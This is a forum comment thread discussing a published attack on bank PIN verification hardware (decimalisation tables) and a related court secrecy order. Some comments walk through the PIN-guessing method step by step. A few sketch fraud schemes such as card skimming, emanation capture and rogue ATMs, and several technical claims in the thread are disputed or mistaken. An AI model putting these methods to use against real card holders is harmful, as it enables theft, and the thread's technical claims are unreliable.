This whole thing about PIN numbers just kills me. In New Zealand, you can walk into a bank branch and (upon supplying ID) get a new bank card and choose your own PIN. The card is totally anonymous so there's no way anybody could perform any kind of cryptographic hash against, for example, the card number embossed on the card (because there isn't one that identifies you) to get the PIN.

Re:Choose your own PIN

[Old+Wolf]

NZ is also (mostly) immune to these problems because banks don't store PINs. All transactions are done online to one big server which has very tight access controls.

Re:Choose your own PIN

Same goes for Sweden. Even happens that the ATM cant contact the bank.

Re:Choose your own PIN

If anyone cared to read the paper, they would find that how the PIN is generated (selected by customer or hashed from the account) is irrelevant. So if your New Zealand bank is using DES PIN verification, you're at risk.

The New Zealand bank I work for uses Visa PVV verification which uses neither Offsets nor Dec Tables so is immune to the crack.

Re:Choose your own PIN

What *are* you talking about ?
One big server ?

You're right to say that banks don't store PINs. They've never been stored - because that's insecure. To do it properly you send encrypted PIN data to a security box which calculates the PIN, compares it to the customer's attempt and returns a yes or no.

The real issue

[SiliconEntity]

Few of you have read the document from Citibank. In the first place, it's not even Citibank! It's Diner's Club, and specifically Diner's Club South Africa, which is suing two customers who refuse to make good on supposed ATM withdrawals. (The withdrawals were made in England while the customers were in South Africa.)

In the second place, the really funny part is that Diner's Club South Africa is trying to force Diner's Club International to produce experts to testify! DCI didn't want to help DCSA to this degree so DCSA is trying to get the courts to force them to help.

But the main point is that the "gag order" reads as follows:

The parties, their legal representative and their experts shall keep confidential all information revealed during the examination and such information shall not be used for any purpose other than the purposes of the Proceedings and the parties shall take all steps necessary to keep such information confidential

This is what Ross Anderson objects to. He agrees that if the DCI experts testify about confidential information regarding the workings of the ATM system, that that should be kept secret. But he doesn't want the secrecy order to be so broad that it would interfere with him and his students publishing data based on publicly available information. He wants to make sure that the secrecy order is drawn to clarify the distinction between information that is available elsewhere and confidential information revealed by the experts.

So when you look at it this way, it's not at all the black and white issue that is being presented here. Neither Diner's Club nor Citibank is seeking a "gag order" to suppress discussion of vulnerabilities. They just want to make sure that confidential testimony by their experts (information which they are contractually bound to keep confidential based on their relationships with others in the financial community) is kept secret. And the only issue is the technical details of how to draft the secrecy order.

In short, it's a tempest in a teapot. Move along, folks. There's really nothing to see here.

Re:The real issue

Why does citibank, or Diner's Club of the Lost British Empire or whatever, have a system that is vulnerable if people know it's workings ? Why isn't all security nicely compartmented into specific keys that don't have to be revealed ? Why is anyone cooperating with any attempt to force people to pay for a withdrawal done half a world away ?

Tempest in a teapot my ass. One more company to add to the blacklist, along with Intel, Microsoft, SBC, Verizon, WorldCom, etc, etc, etc . . . soon I will be reduced to only doing business with Amish virgins, and they have precious little use for by elite assembly coding skills.

Re:The real issue

[Twylite]

Why does (anyone) have a system that is vulnerable if people know it's workings?

Because the system has been in place for years, since before many aspects of security were well researched, and is in the process of being replaced; a process which is taking 8 to 12 years, as a result of the huge global dependancy on existing financial networks.

Why isn't all security nicely compartmented into specific keys that don't have to be revealed?

It is. Read the paper. This is an attack that exploits vulnerabilities in the use of the cryptography and keys.

Why is anyone cooperating with any attempt to force people to pay for a withdrawal done half a world away ?

Because the financial institution in question is accusing the person of committing fraud against the bank by exploiting weaknesses in the system.

Banks have known for some time that weaknesses exist. The problem is that changing financial standards involves global coordination and huge cost. Most banks are still using single DES to protect transactions because of this inertia.

The intent in keeping quiet about these vulnerabilities is not to cause mass histeria and to limit the abuse of the vulnerabilities. As seen in many recent security reports (e.g. "hacking" a master key for locks) secrecy/obscurity does not guarantee security, but it does limit damage, at least in the short term.

Banks are actively working on improving security, a process which will see EMV being supported from next year (in most nations), and which will drag through until 2012 before magstripe cards are completely replaced. In the mean time, one can hardly expect them to publish exploits for all weaknesses that they cannot fix without breaking the global financial network!

Another ATM pin crack in the news today!!

[goombah99]

The Register reports that Mike Bond and Piotr Zielinski have detailed how any ATM programmer (bank, repairman, etc..) insider can crack any ATM PIN in just 15 guesses. Banks use a hardware encryption scheme to avoid the having a crackable psswd-like file. Oops...turns out theres a hole in the hardware design. Direct link to download the pdf paper. Here is how the crack works. first you have to understand how the pin is generated. banks had two problems they needed to solve, first an ATM had to be able to verify a card even if it went off-line from the bank computers. Thus to allow for on the spot verification, the pin has to derivable from the card somehow. Second, they also did not want to endure the security risk having to distribute a list of all PIN numbers of all cards to all machines, even if it was encrypted. So the scheme they came up with is they take your PIN number and DES encrypt it, and the first four digits of the encrypted number becomes your base PIN. Then to allow you to change your pin, they permit an offset number. Since knowing this offset number does not tell anyone the base PIN, these offset numbers can be kept in the public domain and distributed worldwide. thus when you type in your "pin" number to an ATM the sequence of steps is the machine reads the account code off the mag stripe, DES encodes it, grabs the first four numbers, adds your public offset, and compares it to the number you typed in at the key pad. to keep everything secure the entire process is done in hardware. So even a priviledged bank employee could not have access to the encrypted account code and thus learn the PIN. But wait, there's just one teeny tiny extra step I omitted that causes all the problems. when you DES encode something you get back a HEX number and since PINS are decimal you have to convert it to a decimal number. There's lots of ways you could do this, but what is done is simply to have a table that maps the 15 hex digits 0...F many-to-one down to 0...9. Again still no problem if this mapping had been done in hardware. Unfortunately, it was not viewed as a securtiy risk and this mapping table is not fixed but is rather a software input to the hardware unit. Any one with access to the hardware device such as a priviledged bank employee or a repair man, or someone who found one at a salvage yard can send a substitute table to the hardware. And thats where the problem lies. The paper gives several crack approaches one of which takes 15 tries maximum and is not easily explianed in a few words. they also give a simpler approach that takes max of 46 steps to get the pin which I'll explain. first change the many-to-one mapping to all zeros, except for 1 digit. say this digit is a 3. Then type in a trial PIN of 0000. the hardware unit will say this pin is a correct match unless the encrypted Account number happens to have a 3 anywhere in it. (all other get mapped to zero) Next Change the map to all zeros, except say for say the digit 4, and repeat. after trying all ten digits, you know know which digits are in the PIN number. Now you just try all permuations of these. worst case is a total of 36+10=46 trials. Their other algorithm is more efficient (only 15 trials maxiumum), but you get the idea. I note that this is a big problem for the banks. The reason is that it would not simply do to replace the hardware units with ones that have a fixed map table. The PINS are crackable by anyone who still has one of the old hardware units. To fix the system they would have to both change all of the ATM hardware, change the DES salt in the hardware (to render old machines useless), and change everyone's PINS. this would all have to be done simultaneouly, world wide in every ATM for the banking systems ATMs not to stop working for customers. alternatively I guess they could upgrade all the hardware slowly if they were willing to leave the crack in place until they finished. to do this they woul have to have two sets of offsets. one for the new machines and one for the old machines. the cards would remain crackable until the last machine was removed and the users changed their PIN numbers. I note that in a real system it only takes about 5000 tries on average to crack a 4 digit pin. However, the hardware units limit the rate of trials, so that reducing the number of trials by a couple orders of magnitude is significant.

Who has access?

[barryfandango]

From reading the article it would seem that the only people who could pull off something like this are "Bank Programmers," but there's a much bigger security hole that i can think of.

Here in Canada we have non-bank ATM machines proliferating across the countryside - it's basically a machine that performs an Interac (debit) transaction and spits out money. It runs over a telephone line, you can buy one for a few thousand dollars, and you plonk it down in the middle of a bar where people are too drunk to care that you're adding $2.00 to every transaction.

But who are the people making these machines? They have no certification that I'm aware of. I've seen at least a dozen varieties of these "mini-ATMs" from companies whose names I have never heard of. It seems to me that it would be very easy to build a few of these, rent them to bar owners or corner stores (also very common) and just log magnetic strips and PINs till the cows come home. What does the guy who owns the corner store know about security? He'll just be glad that he has an alternative in his store to offering debit himself, which costs him money on every transaction.

So anyway, if anybody has some plans or examples of how to build your own Interac-ATM please post them on the net ASAP and lets talk business.

Re:Who has access?

>They have no certification that I'm aware of.

That's because you're a dumbass that hasn't contacted Interac to ask them the question (or even see -- it might be on their website). They have strong requirements (come on, the big banks wouldn't be that stupid).

A second ATM PIN crack in NEWS today

[goombah99]

oops...posting with the correct formatting this time:
The Register reports that Mike Bond and Piotr Zielinski have detailed how any ATM programmer (bank, repairman, etc..) insider can crack any ATM PIN in just 15 guesses. Banks use a hardware encryption scheme to avoid the having a crackable psswd-like file. Oops...turns out theres a hole in the hardware design. Direct link to download the pdf paper.

Here is how the crack works.

first you have to understand how the pin is generated.

banks had two problems they needed to solve, first an ATM had to be able to verify a card even if it went off-line from the bank computers. Thus to allow for on the spot verification, the pin has to derivable from the card somehow. Second, they also did not want to endure the security risk having to distribute a list of all PIN numbers of all cards to all machines, even if it was encrypted.

So the scheme they came up with is they take your PIN number and DES encrypt it, and the first four digits of the encrypted number becomes your base PIN. Then to allow you to change your pin, they permit an offset number. Since knowing this offset number does not tell anyone the base PIN, these offset numbers can be kept in the public domain and distributed worldwide.

thus when you type in your "pin" number to an ATM the sequence of steps is the machine reads the account code off the mag stripe, DES encodes it, grabs the first four numbers, adds your public offset, and compares it to the number you typed in at the key pad.

to keep everything secure the entire process is done in hardware. So even a priviledged bank employee could not have access to the encrypted account code and thus learn the PIN.

But wait, there's just one teeny tiny extra step I omitted that causes all the problems. when you DES encode something you get back a HEX number and since PINS are decimal you have to convert it to a decimal number. There's lots of ways you could do this, but what is done is simply to have a table that maps the 15 hex digits 0...F many-to-one down to 0...9.

Again still no problem if this mapping had been done in hardware. Unfortunately, it was not viewed as a securtiy risk and this mapping table is not fixed but is rather a software input to the hardware unit. Any one with access to the hardware device such as a priviledged bank employee or a repair man, or someone who found one at a salvage yard can send a substitute table to the hardware. And thats where the problem lies.

The paper gives several crack approaches one of which takes 15 tries maximum and is not easily explianed in a few words. they also give a simpler approach that takes max of 46 steps to get the pin which I'll explain.

first change the many-to-one mapping to all zeros, except for 1 digit. say this digit is a 3. Then type in a trial PIN of 0000. the hardware unit will say this pin is a correct match unless the encrypted Account number happens to have a 3 anywhere in it. (all other get mapped to zero) Next Change the map to all zeros, except say for say the digit 4, and repeat. after trying all ten digits, you know know which digits are in the PIN number. Now you just try all permuations of these. worst case is a total of 36+10=46 trials.

Their other algorithm is more efficient (only 15 trials maxiumum), but you get the idea.

I note that this is a big problem for the banks. The reason is that it would not simply do to replace the hardware units with ones that have a fixed map table. The PINS are crackable by anyone who still has one of the old hardware units. To fix the system they would have to both change all of the ATM hardware, change the DES salt in the hardware (to render old machines useless), and change everyone's PINS. this would all have to be done simultaneouly, world wide in every ATM for the banking systems ATMs not to stop working for customers. alternatively I guess they could upgrade all the hardware slowly if they were willing to leave the crack in place until they finished. to do this they woul have to have two sets of offsets. one for the new machines and one for the old machines. the cards would remain crackable until the last machine was removed and the users changed their PIN numbers.

I note that in a real system it only takes about 5000 tries on average to crack a 4 digit pin. However, the hardware units limit the rate of trials, so that reducing the number of trials by a couple orders of magnitude is significant.

Re:A second ATM PIN crack in NEWS today

[NudeZiggy]

That's strange, especially considering I picked my pin (not from a list) and it has nothing to do with my card number.

-nz

Re:A second ATM PIN crack in NEWS today

That's strange, especially considering I picked my pin (not from a list) and it has nothing to do with my card number.

You only thought you picked your pin. the way it works is you have a permenant pin that is locked to your account number. When you pick a new PIN all the happens is they assign a public offset number between the real pin and the one you think is your pin. the actual PIN stays the same and is derived from the account number.

read the post you replied to or read Bond's article.

Re:A second ATM PIN crack in NEWS today

[Old+Wolf]

Actually it does. Under the scheme discussed in the article (used by some organizations but not all), they calculate a PIN for you, and when you specify your PIN they store the calculated value and the difference between the two (in clear text). So it seems to you as if you have chosen your own PIN.

Re:A second ATM PIN crack in NEWS today

[danb35]

You know, I thought of this yesterday when I read this story on k5 too, but didn't bother posting there:

With at least one of my ATM cards, I can call my bank and change the PIN over the phone. With the scheme described in these articles, that shouldn't be possible, as a different PIN would have a different offset from the "natural" PIN, which new offset would need to be written to the card. How does it work?

Re:A second ATM PIN crack in NEWS today

[tknorris]

any ATM programmer (bank, repairman, etc..) insider can crack any ATM PIN in just 15 guesses.

I haven't been able to read the actual paper yet (link is slashdotted) to see if it contains more information than the post but I fail to see why you have to be an insider to perform these attacks.

Why couldn't your average cracker build any one of the many card readers from schematics found nearly anywhere on the internet. Then somehow gain access to someone's bank card (there are any number of social engineering ways to achieve this...use your imagination). Scan the card with the card reader, and store the result. Next, write software that performs the same algorithm in software that the ATM machines are executing in hardware. (i.e. Supply a entered PIN, subtract the known offset, DES encrypt the result, compare the encrypted result with the encrypted base pin from the card, start over) This would allow the cracker to avoid any lockout issues with trying too many pins and give the cracker plenty of time alone to perform the attack.

What am I missing here?

Re:A second ATM PIN crack in NEWS today

[NudeZiggy]

ooh thaks for clarifying it. I guess I got distracted by all the hex stuff and thought they meant that the offest could only be 0-F, like that thing about needing only 15 (16) tries to break it.

Re:A second ATM PIN crack in NEWS today

I haven't been able to read the actual paper yet (link is slashdotted) to see if it contains more information than the post but I fail to see why you have to be an insider to perform these attacks.

Because you don't have the DES keys stored on the secure hardware device. I came to read comments hoping to gain some knowledge on the specifics of this attack by maybe reading some posts by slashdotters who work in the field, but I had once again overestimated the collective IQ of this assumption happy crowd. sigh..

Re:A second ATM PIN crack in NEWS today

The offset is not only on the card, but also in the bank's computers. When you would try to use your PIN on an offline machine, it would still be the old one that is valid. Once you visit an online machine, it gets your new offset from the central systems and writes it back to the card.
(this only happens in machines that gobble-up the card and return it to you, not in the small desktop units that you swipe your card through manually)

Re:A second ATM PIN crack in NEWS today

The ATM doesn't verify the PIN, so the offset is only needed on the card if the bank allows other ATM networks to verify your PIN. Your bank obviously doesn't.

Goombah's original post made the mistake of assuming that the Hardware devices being talked about are in the ATM - they aren't, they're at the bank.

Having said that, changing the PIN over the phone is still a pretty crappy way of doing things.

Re:A second ATM PIN crack in NEWS today

Read that paper carefully - the hardware units it talks about are not in the ATMs, they're at the banks themselves. So forget about any ATM repairman getting hold of an old one. ATMs don't verify PINs (in a civilised society anyway).

The crack only works for programmers who have access to the hardware devices. Probably reasonably easy to do where security isn't the greatest or the geeks are friendly with the ops.
But if you have that sort of access to run programs, you can probably bypass the software checking for more than 3 tries or whatever, so you may as well do a brute force attack - remember a 4 digit PIN can only have 10,000 combinations. That security leak has always been there. No attacks from North Korea on the NY subway yet !

Keep feeling the fear guys...

Re:A second ATM PIN crack in NEWS today

[Twylite]

This comment is a little off base. To begin with, banking networks do not use "on the spot verification". There are a limited number of hardware cryptography modules in a banking system that have the capability and correct keys to perform PIN verification.

When you enter a PIN at an ATM, it is encrypted using a key that is specific to that ATM. The PIN is transmitted through various networks to reach the back-end verification system; at each change point between networks the PIN is reencrypted under a different key.

The use of an account number in PIN creation binds the PIN to the account number, so that you cannot take an encrypted PIN for one account (say, yours) and use it to access another account by fiddling with the magstripe.

In fact it is your account number that is encrypted to produce the PIN (as the first four digits); while the verification process sees the PIN encrypted under a DIFFERENT key and transmitted to the verification system where it can be checked. The ATM does not verify your PIN!

The paper describes an approach that, if you have API-level access to a verification hardware module AND an encrypted PIN corresponding to a known account number, will establish the PIN in on average 15 guesses.

To reword the last paragraph: if you are a bank employee with access to the most trusted parts of their network, and can sniff that network as well as submit requests, you may be able to perform this attack. Even then, many banks use serial-attached hardware modules, which means you will have to hack the bank's "mainframe" to stage this attack.

In other words, you cannot perform this attack with access to old ATM hardware or most hardware on the financial network. And banks have very strict procedures for disposing of old security hardware. And very strict procedures for gaining access to their most secure systems.

ATMs would not have to be replaced. The decimalisation table is not used by the ATMs ... only the verification system. Locking these tables down in the hardware would prevent this attack (specifically), but there are others than can still be used.

Aside: some people don't believe that ATMs don't verify PINs. They do; it seems really quick because they often allow you to get on with your business while the verification is performed in the background. Simple proof that this is the case: (1) an offline ATM won't allow you to perform a transaction; (2) in order to verify a PIN you need the same DES key that was used to generate the PIN ... so either all banks and PINs in the world use the same key, or an ATM that was deployed before some new bank started operating wouldn't be able to accept cards/PINs from that bank (as it wouldn't have the bank's secret PIN key). Ummm ... no.

Since there are a limited number of verification systems for each bank, a solution would be to have an out-of-band mechanism to permit only specific, approved decimalisation tables to be used in each system. This limits or prevents the attach by preventing unfetered modification of the table, but does not involve any changes to hardware "in the field" or to customer PINs. In effect, a change to the hardware used in the verification process to lock the decimalisation table(s) to predefined values on a per-installation basis would be sufficient (from the paper: "To regain full security, the decimalisation table input must be cryptographically protected so that only authorised tables can be used." [my emphasis]).

Re:A second ATM PIN crack in NEWS today

I agree with this statement and the other comments by Twylite. There is a risk being disclosed here that has been around for a long time, and the same risk exists in most forms of cryptography.

Sure, the proliferation of PIN-use, especially in the US market, increases the potential damage a breach may cause - but the risk has always been there.

Layered security in back-end bank processes, both physical and technical, is required to lower risk. PIN verification calls to a back-end crypto should be audited. Those with access to the auditing should not have access to the API, and vice-versa. Implementing layered security lowers risk.

Fullproof security doesn't exist, especially when referring to the trusted few who actually have access to back-end systems. Methods that could be considered totally secure are impractical to be dumped on the general public.

A bigger risk was mentioned by a Canadian poster, talking about proliferation of PIN-use. People trust it so much that they are willing to whip the ATM card out anywhere and use their PIN - but do you trust every PINPad or Mini-ATM machine at every POS location or grocery checkout ?

Fraudulently obtaining the PIN and Track2 data at the acquiring source (someone rigging a 20 lane checkout group of PINPads, for example)to me poses a bigger threat than this in the near future. Especially in an age of wireless where the critical data could be transmitted to the crooks in realtime. They could get a chronic number of card data and PIN numbers in a short period of time before it was detected. We have to trust the companies deploying these units.

There are other PIN verification methods deployed today that don't expose this risk. But then again, when it comes to referencing the privileged individuals there is always some risk.

We all wish financial institutions could move faster towards new and better security, but those of us in the industry realize just what a tough task this is. Look at the deployment of IC cards in the US market for financial processing - it is almost non existent.

Daniel Spence
President
3Pea Technologies, Inc
dspence@3pea.com

Well, duh...

[dasmegabyte]

How secure can a number that can't be more than 4 digits long BE?

I hate my pin number. I hate that they won't let me use a longer number like I want to. Jesus, I know Pi out to 50 digits...yet the number that exposes all of my funds (yes, they forced me to have the same pin to link my savings, line of credit and money market accounts) is like the combination to a moron's luggage.

Hey you ATM hackers. How much work would it take to make these goddamn things accept a 12 digit pin -- or better still, a passcode.

And to whomever's about to bring up biometrics: shut up.

Re:Well, duh...

I'm guessing it's because it's hardware based, not software based.

To add extra digits, extra circuitry is needed.

If it were software based then it would be no problem at all.

Re:Well, duh...

[cant_get_a_good_nick]

Citibank allows a 4, 5, or 6 digit PIN. Some networks (most international ones) can't handle anything but 4. Maybe you could get two accounts, one for home, with a 6 digit PIN, and one with 4 digits for international travel, where its a real restriction. Check with your bank.

MOD UP

[dachshund]

This guy is correct. The vulnerable system is used by banks in the US just as much (or more) as it is in the UK. The idea was to create ATMs that could verify PIN numbers without dialing into a central computer. Very few ATMs do that these days, but the vulnerability remains.

Re:MOD UP

[whereiswaldo]

The idea was to create ATMs that could verify PIN numbers without dialing into a central computer.

And security professionals thought this up? I sure wouldn't mountain climb with that level of security.

Re:MOD UP

[Dudio]

Of course security professionals didn't think this up. The marketing guys convinced them that nobody would stand for a PIN like {44EC053A-400F-11D0-9DCD-00A0C90391D3}. Remember that PINs have to be simple enough that even PHBs can remember them. This rules out pretty much everything more complicated than the 4-digit numeric we're all used to.

Re:MOD UP

[whereiswaldo]

Remember that PINs have to be simple enough that even PHBs can remember them. This rules out pretty much everything more complicated than the 4-digit numeric we're all used to.

My point is not that the pins are 4 digits long. It's the fact that they can be calculated from some other hidden number or formula. All one has to do is figure what the other number or formula is and bingo - you've got the person's pin.
Without going to the server, this is the only way, no? Not terribly secure. But you're probably right - it wasn't a security pro who came up with it.

BTW - if you generated that GUID from your machine and plan on generating another one tied to your real name, it would be easy for someone to join the two together if they wished to learn your true identity. In case you care. :)

Re:MOD UP

[dachshund]

And security professionals thought this up? I sure wouldn't mountain climb with that level of security.

Remember that security professionals also thought up the old-style Unix password file. That didn't work out so well in the end, either.

Whoever invented this was stuck with some pretty unpleasant parameters. The bank wanted machines that could do offline transactions. Probably every qualified security pro said "are you nuts?" But it was the bank's money and they were prepared to risk it.

There was a big problem back in the 80s with Bank of America, which used to keep bank balances on the magnetic strip. Let me repeat that: bank balances. On the magnetic strip of your ATM card. To give your savings a $5000 boost all you needed was crack the code and buy a card writer. That was somewhat disastrous for BofA, and pretty much put the nail in the coffin of offline verification. Unfortunately, banks still use the broken crypto system for online verification.

And he's lucky they didn't cuff him...

cuz he's clearly a thief.

RTFA!

DMCA? Who said anything about the DMCA? The article is about a British bank trying to keep information about ATM vulnerabilities in a British court case secret.

And who was the idiot who modded this insightful? Geez, seems like all you have to do to get positive karma these days is to say something negative about DMCA.

Re:RTFA!

[grimarr]

Just because the article didn't mention the DMCA, doesn't mean it can't be relevant. Sure this was an article about British events. His point was that if it was an American bank, and American people discovered the flaw, the banks (or the government) could use the DMCA to prevent them from telling people.

Yeah, I know that the DMCA is supposed to be about preventing illegal copying, but it gets stretched WAY beyond that sometimes. Maybe the banks would claim that the encrypted data in the ATM was copyrighted....

Copy paste the link in your browser

The site is up and running fast. They're just blocking URL's with an external referrer.

Pin numbers aren't secure

[estoll]

I know a guy who's brother writes software for POS terminals that you use at gas pumps. He says if you choose the "debit card" payment option, your pin number is transmitted in plain text over the Internet.

Re:Pin numbers aren't secure

[sulli]

POS indeed!

Re:Pin numbers aren't secure

[/dev/trash]

What the hell is a Personal Identification Number number.

read the subject closely

Re:Wouldn't have happened....

The absence of an action does not make such action impossible. To think otherwise is very ego-maniacal.

Wow. I couldn't agree more.

However, this theory isn't readily applied to all the Linux zealots we have here, now is it? Double standard maybe?

The real threat

[goombah99]

After pondering this some I have come to the conclusion that this is a real threat. at first I dismissed it because it was going to take a bank employee with access to programming the machines low level inputs, plus a Very large list of card numbers, plus access to the pin offsets, plus a way to launder the money, plus the ability to make 15 tries without losing the card or having to override the system (which would get noticed).

but then I thought, well where could you do this an not get caught? how about North Korea or Nigeria. North Korea already mints high tech conterfeit US 100 dollar bills on government printing presses. So this would be small but useful potatoes.

but more important than the money, It also would make a nice weapon: UN provokes N. Korea, N korea dumps 100,000 cards with pins written on them in say the NY subway system. Next day all ATM banking is halted world wide. Nice little panic. Travelers stranded. Runs on banks as people have to now go inside to get money and they run out of cash. Anyhow you get the idea.

or maybe just one of the millions of merchant accounts visa hands out is owned by ..... well you name it.
Yikes

Re:The real threat

If this holds true for interac machines as well, it is worse than you think. Pretty much anyone can get hold of an interac terminal. As for card numbers, you just need to clean out the garbage bin at any ATM.

Re:The real threat

[njdj]

at first I dismissed it because it was going to take a bank employee with access to programming the machines low level inputs, plus a Very large list of card numbers, plus access to the pin offsets, plus a way to launder the money

Do you have any idea how many low-paid bank employees there are in rich countries? Obviously not. Have you read Kevin Mitnick's book about the ease of deception? Obviously not. Very large lists of card numbers are routinely stolen from merchants (read the news).
Forget about North Korea and Nigeria, most of this fraud will be done right here.

Re:The real threat

No, each bank verifies it's own PINs. Other countries Banks can't. This attack won't work at all.

most amusing + more links

[alaric_uk]

First off it might be appropriate to link to Mike Bond's site, where he's tracking some of the news articles about his research, and it has unicycle jousting photos. Also of interest may be Ross Anderson's site.

When Ross mentioned the case and the gagging order in a software engineering lecture he was giving on thursday I was amused... but i didn't expect all this. What i think is most amusing is the fact that if citibank hadn't taken the pretty rash decision to pursue litigation rather than investigate it internal and fix the vuln quietly then they wouldn't look anywhere near as foolish!

I think that's probably enough for my first post, but i'd just like to say that i expect the software engineering lecture with Ross Anderson tomorrow will be most amusing.

Ross: 1
Citibank: 0

Alaric.

MODUP!

MOD PAERNT UP

m$ wants sites to stay unavailable

[klparrot]

Click the Refresh button, or try again later.

Gotta love how when the server gets too busy, it suggests you keep hammering it. :)

Why changing you pin does not matter

READ THE THREAD YOU ARE REPLYING TO its explained in the grandparent post.

your base-pin is fixed and unchanging.
they use a public offeset to create a changable pin. changing your pin only changes the offset, not the base pin.

example your base pin is 1234. but you want your pin to be 5555.
citi bank just publishes a pin offset of
4321 for you.

when you use your card and type in 5555
then the machine looks up the public offset for you, subtracts off the offset (4321) and then compares the result 1234 to the pin encoded by the account number. if it matches you get the money.

publishing the offset does not reveal the base pin, so its not considered a security risk. when you change your pin, the base pin number never changes only the public offset.

Re:Why changing you pin does not matter

[vaguelyamused]

Why did this get modded down to 0 when the posters above it obviously didn't take time to read the original post. Yet they end up with +1 and +2 and this guy, who actually read the article and explains it in VERY SIMPLE TERMS for the above morons gets modded down.

Re:Why changing you pin does not matter

He didn't get modded down.
ACs start at 0.

counting money in front of the camera is no proof

[klparrot]

Now I always count it in front of the camera so if there is a problem I've got proof.

What proof? You could easily withdraw a hundred dollars, then show the stack front-on to the camera and claim you only got twenty. There's no proof there.

Question (from the vulnerability report)

[giminy]

Quoth the report:

"However, HSMs [Hardware Security Modules] implementing several common PIN generation methods have a flaw. The first ATMs were IBM 3624s, introduced widely in the US in around 1980, and most PIN generation methods are based upon their approach. They calculate the customer's original PIN by encrypting the account number printed on the front of the customer's card with a secret DES key called a 'PIN generation key'."

Weird. So they're talking about _generated_ PINs. Every bank account I've opened in the last 7 years, I've been able to request my PIN. And if I wanted to change it, I request what to change it to. Does any bank actually still use this method?

I'm a wee bit confused....

Re:Question (from the vulnerability report)

[Beryllium+Sphere(tm)]

The system stores an offset which is the difference between your chosen PIN and the calculated PIN.

canadian banks allow longer pins

[klparrot]

How secure can a number that can't be more than 4 digits long BE?

My PIN is 6 digits; I'm not sure if I was limited to 6 or 8. I'm Canadian, so maybe it's just our banks that allow longer PINs. Nonetheless, I've been able to use my bank card with 6-digit PIN in the States without any trouble.

Re:counting money in front of the camera is no pro

[shotgunefx]

But I don't. I count it out such as not to obscure it. Does it guarantee me anything? No. But it helps. Or it did in the one case I had a problem. (Or maybe because it was only short $20 they just said fuck it.)

Windows and crashing

[t_allardyce]

Nothing to do with crypto, but im worried. Ive heard of allot of ATM's using systems such as.. Windows. I saw a shut down screen from windows NT4 on a NatWest cash machine too. What happens if i withdraw money and after making the transaction with the bank, the ATM crashes without giving me my money?

Was Your Show in R.I. ?

Are you the roadie who was in charge of the fireworks at your show in R.I., the band being great white I think ?

Re:Article got /.ed. Text of the article below:

Yeah, sure, it was slashdotted. I guess you don't have to fool all of the moderators all of the time, just some of the moderators some of the time.

Hope someone with some sense gets some points and mods you into oblivion... Whore.

P.S. Mods, If it's not AC, and not truly slashdotted (try checking the links first, even if you can't be bothered to read the article), then it's redundant.

WinATM...

[zanderredux]

Someone ought make a military-grade ATM programmed in ADA someday. Or not?

Re:counting money in front of the camera is no pro

[cardshark2001]

But I don't. I count it out such as not to obscure it. Does it guarantee me anything? No. But it helps. Or it did in the one case I had a problem. (Or maybe because it was only short $20 they just said fuck it.)

I consider it more likely that they knew how much money should be in the ATM, and there was extra at the end of the day....

Not suprising

[j_kenpo]

This is not very suprising at all.Having worked for Citibank, I can vouch for their poor security and joke of a ethical hack process, Im not suprised that their ATM's (Global CATS is what they are called internaly) encryption scheme for PIN numbers is poor. If I remember correctly, its actually a VB app on a PC. The goal of the ATM was focused more on ease of use and accessibility, or so the training would lead you to believe. Im not exactly sure what the process is in the Branches for PIN assignment, but with the cluelessness of their CGTI (Citigroup Technical Infastrucutre) and their development team, I wouldnt be suprised if these boxes were more vunerable to other attacks. There used to be sites like citibanksucks.com and shitibank.com (I dont think they are still around, I think they were "silenced") that used to point out flaws in Citis systems. They arent the first to sweep bad press under the rug though.

Re:Not suprising

You don't remember correctly.
In fact, it would have been good if you had read the article before babbling.

Re:Not suprising

[j_kenpo]

No, I think I do remember correctly. The article is a criticism for the Racal RG7000 series and various other HSM modules that are supposed to be plug-in and go security for various ATMS (not just Citibanks CATS systems). This is independent of the software that runs the actual interface, hence an excerpt from Racals RG7000 brocure "you can just plug this unit without changes to exsisting software". Oh well, sucks to be a troll doesnt it...

Re:in case of /.

[L7_]

cntrl-A, cntrl-C, cntrl-V

automatic 2+ informative

Webserver seems to be down - new links

[sjmurdoch]

The Computer Laboratory webserver (www.cl.cam.ac.uk) seems to be down for unknown reasons.

Mike Bond has made a temporary webpage The paper on the attack (UCAM-CL-TR-560) is also duplicated.

These URLs are just temporary until the webserver is back up so could disappear at any time.

4 digits anyway

[Darth_Burrito]

Alright I realize this is "different" but ... come on ... how much can we can complain about the secrecy of a 4 digit number. There's only 10,000 different combinations. What pisses me off is my bank uses the pin numbers for your online banking password and they use your frickin social security number as the username. You get 3 tries on every account. So how hard is that to automate a hack?

How many morons we got on this ship?

Why bother to crack it when you can just read it?

Nobody ever bothers to mention the fact that ATM machines are electromagnetically insecure. They aren't RF shielded worth doodle and any reasonably competent spook can capture all of the details of any transaction from across a parking lot. Find a bank with some outside ATMs, park a van with some affordable electronics a hundred or so feet away, spend a few hours capturing data, encode the magnetic strips on a few blank cards using different and still affordable electronics, write the PIN numbers on each card, wait a few days so that everybody forgets seeing your van, travel a few miles to another ATM, and then start withdrawing cash. Move to another ATM and repeat. A couple of hundred bucks 40 or 50 times a day for three or four days adds up to serious cash quickly and probably before anybody notices. Burn the cards and return to step one.

Old version of the new scheme?

[thogard]

The interesting thing about this attack is that its very much like an attack aginst most smart cards except that they lock out after 3 to 5 tries. If you have access to a point of sale network that uses lots of smart cards (say a large food store) and you can keep track of people who come in often and don't get their pin number wrong then you can try 2 guesses per visit. The interesting bit is that once you have the pin code and account number, you can program your own chip card for about $10 if your bank is nice enough to send you your very own chip card writer.

Shucks paw!!

Shucks! I never DID think we can trust these newfangles things...

Re:Sounds like mastermind

[Leeji]

Wow, sounds exactly like a game of Mastermind. But instead, you only get the "right color, maybe right place" pegs back.

Related question: anyone else had $ just vanish?

[jonskerr]

I opened an account with a local bank which recently got bought out by M&I Bank; over the course of a year or two there were several occasions where I suddenly got overdraft notices. Now those are by their nature always a surprise, and I hadn't gone through my statements like I should've for several months and it turned out a statement was missing. When it finally turned up, I went through the entire account from the beginning and found math errors of around a dollar, and nothing that was on the statement that wasn't in my register.

No other account in the 20 yrs I've been banking has ever done this. There was always a reason. And I'm not in the habit of writing checks days before the money will be in there. I concluded there's a problem in the fundamental code running that bank. I want to ask the Slashdot community is this possible? Anyone had similar experiences? Am I just screwed out of the money? It's around $400 now, and I've let the account die, but they're threatening me with collections, and I'd like to not have it affect my credit either.

But it is

[alexo]

When I think about this, the fact that this post was modded as "insightful" by someone is perhaps the most frightening thing I've seen in a long time.

Stop being so damn literal!

The "insightful" moderation need not apply only to the content of a post. It may apply, as I believe was this case, to the fact that it was posted in this context. Sort of "meta insightful".

Not true...

